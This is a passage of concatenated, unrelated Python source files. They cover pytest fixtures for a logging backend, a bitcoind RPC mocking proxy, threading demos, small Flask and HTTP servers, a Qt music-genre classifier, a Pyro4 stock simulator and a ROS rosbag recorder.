ut.get_run = fake_run
ut.get_records = lambda: records_util(record_q)
yield ut
# @pytest.hookimpl(tryfirst=True, hookwrapper=True)
# def pytest_runtest_makereport(item, call):
# outcome = yield
# rep = outcome.get_result()
# if rep.when == "call" and rep.failed:
# print("DEBUG PYTEST", rep, item, call, outcome)
@pytest.fixture
def log_debug(caplog):
caplog.set_level(logging.DEBUG)
yield
# for rec in caplog.records:
# print("LOGGER", rec.message, file=sys.stderr)
# ----------------------
# internal test fixtures
# ----------------------
@pytest.fixture()
def internal_result_q():
return queue.Queue()
@pytest.fixture()
def internal_sender_q():
return queue.Queue()
@pytest.fixture()
def internal_writer_q():
return queue.Queue()
@pytest.fixture()
def internal_process():
# FIXME: return mocked process (needs is_alive())
return MockProcess()
class MockProcess:
def __init__(self):
self._alive = True
def is_alive(self):
return self._alive
@pytest.fixture()
def internal_sender(record_q, internal_result_q, internal_process):
return BackendSender(
record_q=record_q, result_q=internal_result_q, process=internal_process,
)
@pytest.fixture()
def internal_sm(
runner,
internal_sender_q,
internal_result_q,
test_settings,
mock_server,
internal_sender,
):
with runner.isolated_filesystem():
test_settings.root_dir = os.getcwd()
sm = SendManager(
settings=test_settings,
record_q=internal_sender_q,
result_q=internal_result_q,
interface=internal_sender,
)
yield sm
@pytest.fixture()
def stopped_event():
stopped = threading.Event()
yield stopped
@pytest.fixture()
def internal_hm(
runner,
record_q,
internal_result_q,
test_settings,
mock_server,
internal_sender_q,
internal_writer_q,
internal_sender,
stopped_event,
):
with runner.isolated_filesystem():
test_settings.root_dir = os.getcwd()
hm = HandleManager(
settings=test_settings,
record_q=record_q,
result_q=internal_result_q,
stopped=stopped_event,
sender_q=internal_sender_q,
writer_q=internal_writer_q,
interface=internal_sender,
)
yield hm
@pytest.fixture()
def internal_get_record():
def _get_record(input_q, timeout=None):
try:
i = input_q.get(timeout=timeout)
except queue.Empty:
return None
return i
return _get_record
@pytest.fixture()
def start_send_thread(
internal_sender_q, internal_get_record, stopped_event, internal_process
):
def start_send(send_manager):
def target():
try:
while True:
payload = internal_get_record(
input_q=internal_sender_q, timeout=0.1
)
if payload:
send_manager.send(payload)
elif stopped_event.is_set():
break
except Exception as e:
stopped_event.set()
internal_process._alive = False
t = threading.Thread(target=target)
t.name = "testing-sender"
t.daemon = True
t.start()
return t
yield start_send
stopped_event.set()
@pytest.fixture()
def start_handle_thread(record_q, internal_get_record, stopped_event):
def start_handle(handle_manager):
def target():
while True:
payload = internal_get_record(input_q=record_q, timeout=0.1)
if payload:
handle_manager.handle(payload)
elif stopped_event.is_set():
break
t = threading.Thread(target=target)
t.name = "testing-handler"
t.daemon = True
t.start()
return t
yield start_handle
stopped_event.set()
@pytest.fixture()
def start_backend(
mocked_run,
internal_hm,
internal_sm,
internal_sender,
start_handle_thread,
start_send_thread,
log_debug,
):
def start_backend_func(initial_run=True):
ht = start_handle_thread(internal_hm)
st = start_send_thread(internal_sm)
if initial_run:
_ = internal_sender.communicate_run(mocked_run)
return (ht, st)
yield start_backend_func
@pytest.fixture()
def stop_backend(
mocked_run,
internal_hm,
internal_sm,
internal_sender,
start_handle_thread,
start_send_thread,
):
def stop_backend_func(threads=None):
threads = threads or ()
done = False
internal_sender.publish_exit(0)
for _ in range(30):
poll_exit_resp = internal_sender.communicate_poll_exit()
if poll_exit_resp:
done = poll_exit_resp.done
if done:
break
time.sleep(1)
internal_sender.join()
for t in threads:
t.join()
assert done, "backend didnt shutdown"
yield stop_backend_func
@pytest.fixture
def publish_util(
mocked_run, mock_server, internal_sender, start_backend, stop_backend, parse_ctx,
):
def fn(metrics=None, history=None, artifacts=None):
metrics = metrics or []
history = history or []
artifacts = artifacts or []
threads = start_backend()
for m in metrics:
internal_sender._publish_metric(m)
for h in history:
internal_sender.publish_history(**h)
for a in artifacts:
internal_sender.publish_artifact(**a)
stop_backend(threads=threads)
ctx_util = parse_ctx(mock_server.ctx)
return ctx_util
yield fn
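# An illustrative sketch of driving publish_util from a test; the history
# payload shape (step/data keys) is an assumption based on the sender interface
# above, and the metric name is a placeholder.
#
# def test_publish_history(publish_util):
#     ctx_util = publish_util(history=[dict(step=0, data=dict(loss=0.5))])
#     assert ctx_util is not None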
@pytest.fixture
def tbwatcher_util(
mocked_run, mock_server, internal_hm, start_backend, stop_backend, parse_ctx,
):
def fn(write_function, logdir="./", save=True, root_dir="./"):
start_backend()
proto_run = pb.RunRecord()
mocked_run._make_proto_run(proto_run)
run_start = pb.RunStartRequest()
run_start.run.CopyFrom(proto_run)
request = pb.Request()
request.run_start.CopyFrom(run_start)
record = pb.Record()
record.request.CopyFrom(request)
internal_hm.handle_request_run_start(record)
internal_hm._tb_watcher.add(logdir, save, root_dir)
# need to sleep to give time for the tb_watcher delay
time.sleep(15)
write_function()
stop_backend()
ctx_util = parse_ctx(mock_server.ctx)
return ctx_util
yield fn
@pytest.fixture
def inject_requests(mock_server):
"""Fixture for injecting responses and errors to mock_server."""
# TODO(jhr): make this compatible with live_mock_server
return utils.InjectRequests(ctx=mock_server.ctx)
|
btcproxy.py
|
""" A bitcoind proxy that allows instrumentation and canned responses
"""
from flask import Flask, request
from bitcoin.rpc import JSONRPCError
from bitcoin.rpc import RawProxy as BitcoinProxy
from cheroot.wsgi import Server
from cheroot.wsgi import PathInfoDispatcher
import decimal
import flask
import json
import logging
import os
import threading
class DecimalEncoder(json.JSONEncoder):
"""By default json.dumps does not handle Decimals correctly, so we override it's handling
"""
def default(self, o):
if isinstance(o, decimal.Decimal):
return "{:.8f}".format(float(o))
return super(DecimalEncoder, self).default(o)
class BitcoinRpcProxy(object):
def __init__(self, bitcoind, rpcport=0):
self.app = Flask("BitcoindProxy")
self.app.add_url_rule("/", "API entrypoint", self.proxy, methods=['POST'])
self.rpcport = rpcport
self.mocks = {}
self.mock_counts = {}
self.bitcoind = bitcoind
self.request_count = 0
def _handle_request(self, r):
conf_file = os.path.join(self.bitcoind.bitcoin_dir, 'bitcoin.conf')
brpc = BitcoinProxy(btc_conf_file=conf_file)
method = r['method']
# If we have set a mock for this method reply with that instead of
# forwarding the request.
if method in self.mocks and isinstance(self.mocks[method], dict):
self.mock_counts[method] += 1
return self.mocks[method]
elif method in self.mocks and callable(self.mocks[method]):
self.mock_counts[method] += 1
return self.mocks[method](r)
try:
reply = {
"result": brpc._call(r['method'], *r['params']),
"error": None,
"id": r['id']
}
except JSONRPCError as e:
reply = {
"error": e.error,
"code": -32603,
"id": r['id']
}
self.request_count += 1
return reply
def proxy(self):
r = json.loads(request.data.decode('ASCII'))
if isinstance(r, list):
reply = [self._handle_request(subreq) for subreq in r]
else:
reply = self._handle_request(r)
response = flask.Response(json.dumps(reply, cls=DecimalEncoder))
response.headers['Content-Type'] = 'application/json'
return response
def start(self):
d = PathInfoDispatcher({'/': self.app})
self.server = Server(('0.0.0.0', self.rpcport), d)
self.proxy_thread = threading.Thread(target=self.server.start)
self.proxy_thread.daemon = True
self.proxy_thread.start()
# Now that bitcoind is running on the real rpcport, let's tell all
# future callers to talk to the proxyport. We use the bind_addr as a
# signal that the port is bound and accepting connections.
while self.server.bind_addr[1] == 0:
pass
self.rpcport = self.server.bind_addr[1]
logging.debug("BitcoinRpcProxy proxying incoming port {} to {}".format(self.rpcport, self.bitcoind.rpcport))
def stop(self):
self.server.stop()
self.proxy_thread.join()
logging.debug("BitcoinRpcProxy shut down after processing {} requests".format(self.request_count))
def mock_rpc(self, method, response=None):
"""Mock the response to a future RPC call of @method
The response can either be a dict with the full JSON-RPC response, or a
function that returns such a response. If the response is None the mock
is removed and future calls will be passed through to bitcoind again.
"""
if response is not None:
self.mocks[method] = response
self.mock_counts[method] = 0
elif method in self.mocks:
del self.mocks[method]
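# A minimal usage sketch (illustrative only): "bitcoind" stands for whatever
# node fixture the test harness provides, and the canned reply below is fake.
#
# proxy = BitcoinRpcProxy(bitcoind)
# proxy.start()
# proxy.mock_rpc("getblockcount", {"result": 42, "error": None, "id": 1})
# ... point the code under test at proxy.rpcport ...
# proxy.mock_rpc("getblockcount")  # passing no response removes the mock again
# proxy.stop()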
|
demo03.py
|
from threading import Condition, Thread
import time
class PeriodicTimer:
def __init__(self, interval):
self.interval = interval
self._cv = Condition()
self._flag = 0
def run(self):
while True:
time.sleep(self.interval)
with self._cv:
self._flag ^= 1
self._cv.notify_all()
def start(self):
t = Thread(target=self.run)
t.daemon = True
t.start()
def wait_for_tick(self):
with self._cv:
last_flag = self._flag
while last_flag == self._flag:
self._cv.wait()
def countdown(nticks, ptimer):
while nticks > 0:
ptimer.wait_for_tick()
print('T-minus', nticks)
nticks -= 1
def countup(nticks, ptimer):
n = 0
while n < nticks:
ptimer.wait_for_tick()
print('counting', n)
n += 1
if __name__ == '__main__':
ptimer = PeriodicTimer(3)
Thread(target=countdown, args=(10, ptimer)).start()
Thread(target=countup, args=(5, ptimer)).start()
ptimer.start()
|
Server.py
|
import sys
import logging
import thread
import threading
from BaseHTTPServer import HTTPServer as HTTPServer
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
from RequestHandler import RequestHandler
from HttpMiddleware import HttpMiddleware, ApiMiddleware
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
level=logging.DEBUG,
stream=sys.stdout)
# noinspection PyTypeChecker
def get_parser():
"""Get a command line parser for docker-hook."""
parser = ArgumentParser(description=__doc__,
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument("--port",
dest="port",
type=int,
default=8073,
metavar="PORT",
help="port where it listens")
return parser
def load_middleware(server):
"""
:type server: HTTPServer
"""
middleware = HttpMiddleware.HttpMiddleware(HttpMiddleware.HttpMiddlewareFilter())
middleware.registry(ApiMiddleware.ApiMiddleware(HttpMiddleware.HttpMiddlewareFilter('^/api/')))
server.middleware = middleware
def main(port=8073):
"""
:type port: int
"""
server = HTTPServer(('', port), RequestHandler)
# Load Middleware
load_middleware(server)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
logging.info('Server is set up on port: %s\n', port)
return server
if __name__ == '__main__':
parser = get_parser()
args = parser.parse_args()
server = main(args.port)
if sys.platform != 'darwin':
sys.stdin = open('/dev/tty')
try:
user_input = raw_input('press ctrl+c to stop...\n')
except KeyboardInterrupt:
server.shutdown()
exit()
|
run_qtgui_with_spectogram.py
|
import numpy as np
import torch
import sys
from collections import Counter
from sklearn.preprocessing import LabelEncoder
from librosa.core import load
from librosa.feature import melspectrogram
from librosa import power_to_db
from librosa import amplitude_to_db
from model import genreNet
from config import MODELPATH
from config import GENRES
import librosa.display
import matplotlib.pyplot as plt
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
import time
import os
from PySide2 import QtCore, QtGui, QtWidgets
from PySide2.QtWidgets import QApplication, QWidget, QInputDialog, QLineEdit, QFileDialog
import warnings
import threading
fileName = None
warnings.filterwarnings("ignore")
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(400, 400)
MainWindow.setMaximumSize(400, 400)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.widget = QtWidgets.QWidget(self.centralwidget)
self.widget.setGeometry(QtCore.QRect(20, 10, 363, 317))
self.widget.setObjectName("widget")
self.gridLayout = QtWidgets.QGridLayout(self.widget)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.button2 = QtWidgets.QPushButton(self.widget)
self.button2.setObjectName("button2")
self.gridLayout.addWidget(self.button2, 4, 0, 1, 1)
self.label = QtWidgets.QLabel(self.widget)
font = QtGui.QFont()
font.setPointSize(8)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.button1 = QtWidgets.QPushButton(self.widget)
self.button1.setObjectName("button1")
self.gridLayout.addWidget(self.button1, 3, 0, 1, 1)
self.openfile = QtWidgets.QLabel(self.widget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.openfile.setFont(font)
self.openfile.setAlignment(QtCore.Qt.AlignCenter)
self.openfile.setObjectName("openfile")
self.gridLayout.addWidget(self.openfile, 1, 0, 1, 1)
self.text = QtWidgets.QPlainTextEdit(self.widget)
font = QtGui.QFont()
font.setPointSize(11)
font.setBold(True)
self.text.setFont(font)
self.text.setObjectName("text")
# self.text.setReadOnly(True)
self.gridLayout.addWidget(self.text, 6, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.button2.setText(_translate("MainWindow", "Откри жанр"))
self.label.setText(_translate("MainWindow", "Отвори музичка датотека и откри го нејзиниот музички жанр"))
self.button1.setText(_translate("MainWindow", "Отвори датотека"))
self.button1.clicked.connect(self.openFile)
self.button2.clicked.connect(self.thread)
self.text.setReadOnly(True)
self.button2.setEnabled(False)
self.pbar = QtWidgets.QProgressBar(self.widget)
self.pbar.setTextVisible(False)
self.pbar.setObjectName("pbar")
self.gridLayout.addWidget(self.pbar, 5, 0, 1, 1)
self.pbar.setMinimum(0)
self.pbar.setMaximum(100)
def openFile(self):
options = QtWidgets.QFileDialog.Options()
global fileName
fileName, _ = QtWidgets.QFileDialog.getOpenFileName(
None,
"Open Music Files",
os.getcwd(),
"Music Files (*.mp3);;All Files (*)",
options=options)
if len(fileName) != 0:
self.openfile.setText(os.path.basename(fileName))
self.text.clear()
self.button2.setEnabled(True)
else:
self.openfile.clear()
self.button2.setEnabled(False)
def main(self):
le = LabelEncoder().fit(GENRES)
# ------------------------------- #
## LOAD TRAINED GENRENET MODEL
net = genreNet()
net.load_state_dict(torch.load(MODELPATH, map_location='cpu'))
# ------------------------------- #
## LOAD AUDIO
audio_path = fileName
# os.path.basename()
y, sr = load(audio_path, mono=True, sr=22050)
# ------------------------------- #
## AUDIO SPECTROGRAM
fspec1 = melspectrogram(y, sr=sr, n_mels=128)
# plt.subplot(3, 1, 1)
spec1_amp = amplitude_to_db(fspec1, ref=np.max)
plt.figure(figsize=(10, 4))
librosa.display.specshow(spec1_amp, sr=sr, x_axis='time', y_axis='mel')
plt.colorbar(format='%+2.0f dB')
plt.title('Mel Power Spectogram')
plt.tight_layout()
if os.path.exists('../spectograms/mel_pow_spectogram.png'):
plt.savefig('../spectograms/mel_pow_spectogram_{}.png'.format(int(time.time())), dpi=300)
else:
plt.savefig('../spectograms/mel_pow_spectogram.png', dpi=300)
# plt.subplot(3, 1, 2)
plt.figure(figsize=(10, 4))
librosa.display.specshow(fspec1 ** 2, sr=sr, y_axis='log')
plt.colorbar()
plt.title('Power Spectogram')
plt.tight_layout()
if os.path.exists('../spectograms/pow_spectogram.png'):
plt.savefig('../spectograms/pow_spectogram_{}.png'.format(int(time.time())), dpi=300)
else:
plt.savefig('../spectograms/pow_spectogram.png', dpi=300)
# plt.subplot(3, 1, 3)
plt.figure(figsize=(10, 4))
librosa.display.specshow(power_to_db(fspec1 ** 2, ref=np.max), sr=sr, y_axis='log', x_axis='time')
plt.colorbar(format='%+2.0f dB')
plt.title('Log-Power Spectrogram')
plt.tight_layout()
if os.path.exists('../spectograms/log_pow_spectogram.png'):
plt.savefig('../spectograms/log_pow_spectogram_{}.png'.format(int(time.time())), dpi=300)
else:
plt.savefig('../spectograms/log_pow_spectogram.png', dpi=300)
# ------------------------------- #
## GET CHUNKS OF AUDIO SPECTROGRAMS
S = melspectrogram(y, sr).T
S = S[:-1 * (S.shape[0] % 128)]
num_chunk = S.shape[0] / 128
data_chunks = np.split(S, num_chunk)
# ------------------------------- #
## CLASSIFY SPECTROGRAMS
genres = list()
for i, data in enumerate(data_chunks):
data = torch.FloatTensor(data).view(1, 1, 128, 128)
preds = net(data)
pred_val, pred_index = preds.max(1)
pred_index = pred_index.data.numpy()
pred_val = np.exp(pred_val.data.numpy()[0])
pred_genre = le.inverse_transform(pred_index).item()
if pred_val >= 0.5:
genres.append(pred_genre)
# ------------------------------- #
s = float(sum([v for k, v in dict(Counter(genres)).items()]))
pos_genre = sorted([(k, v / s * 100) for k, v in dict(Counter(genres)).items()], key=lambda x: x[1],
reverse=True)
for genre, pos in pos_genre:
print("%10s: \t%.2f\t%%\n" % (genre, pos))
self.text.insertPlainText("%10s: \t%.2f\t%%\n" % (genre, pos))
self.button1.setEnabled(True)
self.button2.setEnabled(True)
self.pbar.setMinimum(0)
self.pbar.setMaximum(100)
#self.pbar.deleteLater()
return
def thread(self):
self.button1.setEnabled(False)
self.button2.setEnabled(False)
self.pbar.setMinimum(0)
self.pbar.setMaximum(0)
t=threading.Thread(target=self.main, args=())
t.start()
return
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Its alive!"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
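# A minimal usage sketch, assuming this module is imported by a long-running
# script (for example a bot); run_my_bot_forever is a placeholder name.
#
# from keep_alive import keep_alive
#
# keep_alive()          # start the Flask ping server on a background thread
# run_my_bot_forever()  # the actual long-running work goes here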
|
stockmarket.py
|
from __future__ import print_function
import random
import threading
import time
import Pyro4
class StockMarket(object):
def __init__(self, marketname, symbols):
self.name = marketname
self.symbolmeans = {}
for symbol in symbols:
self.symbolmeans[symbol] = random.uniform(20, 200)
self.aggregators = []
def generate(self):
quotes = {}
for symbol, mean in self.symbolmeans.items():
if random.random() < 0.2:
quotes[symbol] = round(random.normalvariate(mean, 20), 2)
print("new quotes generated for", self.name)
for aggregator in self.aggregators:
aggregator.quotes(self.name, quotes)
@Pyro4.expose
def listener(self, aggregator):
print("market {0} adding new aggregator".format(self.name))
self.aggregators.append(aggregator)
@Pyro4.expose
def symbols(self):
return list(self.symbolmeans.keys())
def run(self):
def generate_symbols():
while True:
time.sleep(random.random())
self.generate()
thread = threading.Thread(target=generate_symbols)
thread.setDaemon(True)
thread.start()
def main():
nasdaq = StockMarket("NASDAQ", ["AAPL", "CSCO", "MSFT", "GOOG"])
newyork = StockMarket("NYSE", ["IBM", "HPQ", "BP"])
with Pyro4.Daemon() as daemon:
nasdaq_uri = daemon.register(nasdaq)
newyork_uri = daemon.register(newyork)
with Pyro4.locateNS() as ns:
ns.register("example.stockmarket.nasdaq", nasdaq_uri)
ns.register("example.stockmarket.newyork", newyork_uri)
nasdaq.run()
newyork.run()
print("Stockmarkets running.")
daemon.requestLoop()
if __name__ == "__main__":
main()
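# A minimal companion sketch of an aggregator the markets above can call back
# into. It assumes the Pyro4 name server is running and that main() registered
# the markets under the names used below; the Aggregator class itself is
# illustrative and not part of this module.
@Pyro4.expose
class Aggregator(object):
    def quotes(self, market, quotes):
        # Called remotely by StockMarket.generate() for each batch of quotes.
        for symbol, value in quotes.items():
            print("{0}: {1} = {2}".format(market, symbol, value))


def run_aggregator():
    with Pyro4.Daemon() as daemon:
        agg = Aggregator()
        daemon.register(agg)  # registered so it can be passed as a callback proxy
        for name in ("example.stockmarket.nasdaq", "example.stockmarket.newyork"):
            market = Pyro4.Proxy("PYRONAME:" + name)
            market.listener(agg)
        daemon.requestLoop()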
|
dynamic_recorder.py
|
#!/usr/bin/python3
#******************************************************************************
#
#"Distribution A: Approved for public release; distribution unlimited. OPSEC #4046"
#
#PROJECT: DDR
#
# PACKAGE :
# ORIGINAL AUTHOR :
# MODIFIED DATE :
# MODIFIED BY :
# REVISION :
#
# Copyright (c) 2020 DCS Corporation
#
# Unlimited Rights assigned to the U.S. Government
#
# This material may be reproduced by or for the U.S Government pursuant
# to the copyright license under the clause at DFARS 252.227-7013. This
# notice must appear in all copies of this file and its derivatives.
#******************************************************************************
#
#Copyright (c) 2019-2020 U.S. Federal Government (in countries where recognized)
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to use,
#copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
#Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
#MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
#DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
#ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
#DEALINGS IN THE SOFTWARE.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import os
from pathlib import Path
import shutil
import subprocess
import sys
import threading
import rosbag
import rospkg
import rospy
from ddr_data_recorder.msg import Event
from std_msgs.msg import String
from TopicParser import TopicParser
ROS_PACK = rospkg.RosPack()
PKG_DIR = ROS_PACK.get_path('ddr_data_recorder')
SCRIPTS_PATH = os.path.join(PKG_DIR, 'scripts')
sys.path.insert(1, SCRIPTS_PATH)
import util # pylint: disable=wrong-import-position
CONNECTIONS_PATH = os.path.join(SCRIPTS_PATH, 'connections')
sys.path.insert(1, CONNECTIONS_PATH)
from connections_generator import ConnectionsGenerator # pylint: disable=wrong-import-position, import-error
## The Dynamic Recording functionality
# Used to dynamically record and kill bags depending on
# various state changes and the topics within those states.
# Uses a few ROS parameters such as split size, path, and
# overlap; these must be set in the launch file for this to run.
class DynamicRecorder: # pylint: disable=too-many-instance-attributes
## The Constructor
def __init__(self):
# The path for the kml.xml file location
xml_path = os.path.dirname(__file__) + rospy.get_param("topicXML")
# A topic parser object used in the record and filter function
self.topic_parser = TopicParser(xml_path)
## @var The message coming off the callback function used to determine
# the event state and what topics will be filtered into what bags
self.data = None
# @var used to change bag sizes
self.split_size = rospy.get_param("splitSize")
## @var This list is going to track the modes that the current active
# bag has been active for. We are going to use this to get all the
# topics for all the modes in this list.
self.active_bag_modes = []
# Temporary, is set on callback
self.bag_name = 'DeezBags'
## Thread Locks
# @var used to change running status
self.run_lock = threading.Lock()
# @var used to send error messages
# TODO: Is this used?
self.thread_lock = threading.Lock()
# @var bool Used to track if we're running or not.
self.is_running = False
self.is_filtering = False
# @var used to change the bag directory location
self.directory = rospy.get_param("directory")
## @var bag_path
# The full path where bags are saved
self.bag_path = Path(self.directory).expanduser()
# Create ddr_bags directory on startup if it does not exist
self.bag_path.mkdir(exist_ok=True)
test_event = rospy.get_param("testEvent")
## @var init_index
# used to initialize the index
if test_event:
self.test_event_dir = self.bag_path.joinpath('test_event_bags')
self.test_event_dir.mkdir(exist_ok=True)
ddr_bags_init = DynamicRecorder.get_mode_counter_index(
self.bag_path)
test_bags_init = DynamicRecorder.get_mode_counter_index(
self.bag_path.joinpath("test_event_bags"))
if ddr_bags_init < test_bags_init:
self.init_index = test_bags_init
else:
self.init_index = ddr_bags_init
else:
self.init_index = DynamicRecorder.get_mode_counter_index(
self.bag_path)
# @var int the index of the bag we're currently recording
self.bag_process_counter = self.init_index
# Check for existing DDR_MAINBAGS files
split_number = 0
mainbags_list = util.get_mainbags_files_list(self.bag_path) # pylint: disable=no-member
if mainbags_list:
self.init_index += 1
util.sort_mainbags_files_list(mainbags_list) # pylint: disable=no-member
for bag in mainbags_list:
if bag.endswith(".active"):
Path(bag).unlink()
else:
new_bag_name = "{}_floatingMainBag_{}.bag".format(
self.init_index, split_number)
shutil.move(bag, str(self.bag_path.joinpath(new_bag_name)))
split_number += 1
## @var the split counter; incremented on each filter and
# reset when bag_process_counter changes
self.bag_split_counter = 0
# @var Checks the previous event ID for any changes in the process
self.previous_event_id = None
# @var Checks the previous event type for any changes in the process
self.previous_event_type = None
self.previous_event_topics = []
self.has_mode_changed = False
## @var List of bags that are currently being filtered. Useful if we
# start filtering multiple bags at once.
self.bags_currently_being_filtered = []
self.ns_add = set()
self.ns_subtract = set()
self.connection_generator = ConnectionsGenerator(
os.path.join(SCRIPTS_PATH, 'dynamic_recording'))
self.update_ros_connections()
## Initializes the node to listen for events and
# hand off messages to callback function
self.ros_connections_sub = rospy.Subscriber(
'/ddr/ros_connections', String, self.ros_connections_callback)
self.event_sub = rospy.Subscriber(
"/ddr/event", Event, self.recording_callback)
self.pub = rospy.Publisher(
"/ddr/bag_filter_status", String, queue_size=10)
rospy.spin()
## Gets the starting index to use for new bag recordings based on existing bag files
# @returns index int The exact index to start using for recording.
@staticmethod
def get_mode_counter_index(file_path):
file_list = []
index = 0
for file in file_path.iterdir():
if file.is_file() and \
".bag" in file.name and \
"DDR_MAINBAGS" not in file.name:
# 1_idle_3.bag
file_list.append(int(file.name.split("_")[0]))
if file_list:
file_list.sort()
index = file_list[-1]
return index
## Used to safely start dynamic recording
def start_recording(self):
if not self.is_running:
self.is_running = True
self.record()
## Uses the TopicParser class to generate a list of topics
# Requires the event and file location to determine topics
# TODO Fill out this documentation
# @param event_id string
# @param event_type string
# @return topic_list string a space-separated string of all the topics
def topics_to_filter(self, event_id=None, event_type=None):
if event_id is None:
event_id = self.data.eventID
if event_type is None:
event_type = self.data.eventType
self.topic_parser.conditions[event_id] = str(event_type)
self.topic_parser.processGroupsNode()
self.topic_parser.finalizeTopics()
topic_list = self.topic_parser.getFinalTopics()
self.previous_event_topics = topic_list
return topic_list
## Core functionality of the program. The process is one singular stream of
# recording through the whole program. The topic parser is initialized with
# all of the condition modes in mind to record all topics. Takes the topics
# generated from the TopicParser and then creates a rosbag record command.
# Did not use the rosbag API due to runtime error concerns.
def record(self):
self.topic_parser.processGroupsNode()
self.topic_parser.finalizeTopics()
topics = self.topic_parser.getSuperset()
self.ns_add = self.topic_parser.getnsAdd()
# TODO: Is this used?
self.ns_subtract = self.topic_parser.getnsSubtract()
## Starting bash command
# Cannot use rosbag API because it does not let us choose settings
dynamic_record_command = ["rosbag record "]
dynamic_record_command.append(
'--split --duration=' + str(self.split_size))
dynamic_record_command.append(
"-O " + str(self.bag_path) + "/DDR_MAINBAGS")
dynamic_record_command.append(
" ".join(topics))
dynamic_record_command.append(
" -e \"(" + " | ".join(self.ns_add) + ")\" ")
# dynamic_record_command.append(
# " -x \"(" + " | ".join(self.ns_subtract) + ")\" ")
dynamic_record_command.append("__name:=DDR_MAIN_RECORDING")
dynamic_record_command.append(">> /dev/null")
## Call Command on Console
try:
subprocess.Popen(" ".join(dynamic_record_command), shell=True)
except subprocess.CalledProcessError:
print("There was a problem getting the rosbag recording started.")
## Used to safely start the filtering thread
def start_filtering(self):
if not self.is_filtering:
thread = threading.Thread(target=self.find_bag_to_filter)
thread.daemon = True
thread.start()
## Finds the bag to filter based on the name of the bag in the file location
# Calls the filter function within its own separate thread
def find_bag_to_filter(self):
while self.is_running:
for file in self.bag_path.iterdir():
if file.is_file() and \
file.name.endswith(".bag") and \
"DDR_MAINBAGS" in file.name and \
"filtering" not in file.name and \
file.name not in self.bags_currently_being_filtered:
self.bags_currently_being_filtered.append(file.name)
self.filter_bag(file.name)
## Filters a specific bag file depending on the modes inside of
# self.active_bag_modes.
# @param bag_name_to_filter string The name of the bag file to filter.
def filter_bag(self, bag_name_to_filter):
# Grabs the last mode the bag split was active for.
new_bag_last_mode = self.active_bag_modes[-1]
post_filter_topic_list = self.topics_to_filter(
event_id="topicGroup", event_type=" ".join(self.active_bag_modes))
# Add "filtering" to the bag name while it is being filtered
temp_list = bag_name_to_filter.split("_")
temp_list.insert(2, "filtering")
new_bag_name_with_path = str(self.bag_path) + '/' + '_'.join(temp_list)
bag_path_to_filter = str(self.bag_path) + '/' + bag_name_to_filter
final_bag_path = str(self.bag_path) + '/' + \
str(self.bag_process_counter) + "_" + \
new_bag_last_mode + "_" + \
str(self.bag_split_counter) + '.bag'
with rosbag.Bag(bag_path_to_filter, 'r') as bag:
connection_info = bag.get_type_and_topic_info()
self.connection_generator.add_connection(
final_bag_path, connection_info)
input_arguments_to_filter = []
input_arguments_to_filter.append(os.path.join(
SCRIPTS_PATH,
'dynamic_recording/bag_filter'
))
input_arguments_to_filter.append(bag_path_to_filter)
input_arguments_to_filter.append(new_bag_name_with_path)
input_arguments_to_filter.append(post_filter_topic_list)
try:
proc = subprocess.Popen(" ".join(input_arguments_to_filter),
shell=True, stdout=subprocess.PIPE)
output = proc.stdout.read().decode("utf-8")
# Rename filtered bag to final name
shutil.move(new_bag_name_with_path, final_bag_path)
if output == "1":
if bag_name_to_filter in self.bags_currently_being_filtered:
self.bags_currently_being_filtered.remove(
bag_name_to_filter)
else:
print("Problem removing a bag from list. Bag Name: {} " \
"List of Bags: {}".format(
bag_name_to_filter,
self.bags_currently_being_filtered))
# No matter what, we want to keep the last mode we were in
# for the next filtering of a bag file.
self.active_bag_modes = [self.active_bag_modes[-1]]
with self.run_lock:
print("we're incrementing the bag")
self.bag_split_counter += 1
else:
msg = String()
msg.data = "Error output of bag_filter: " + str(output)
self.pub.publish(msg)
except subprocess.CalledProcessError:
print("There was a problem getting the rosbag recording started.")
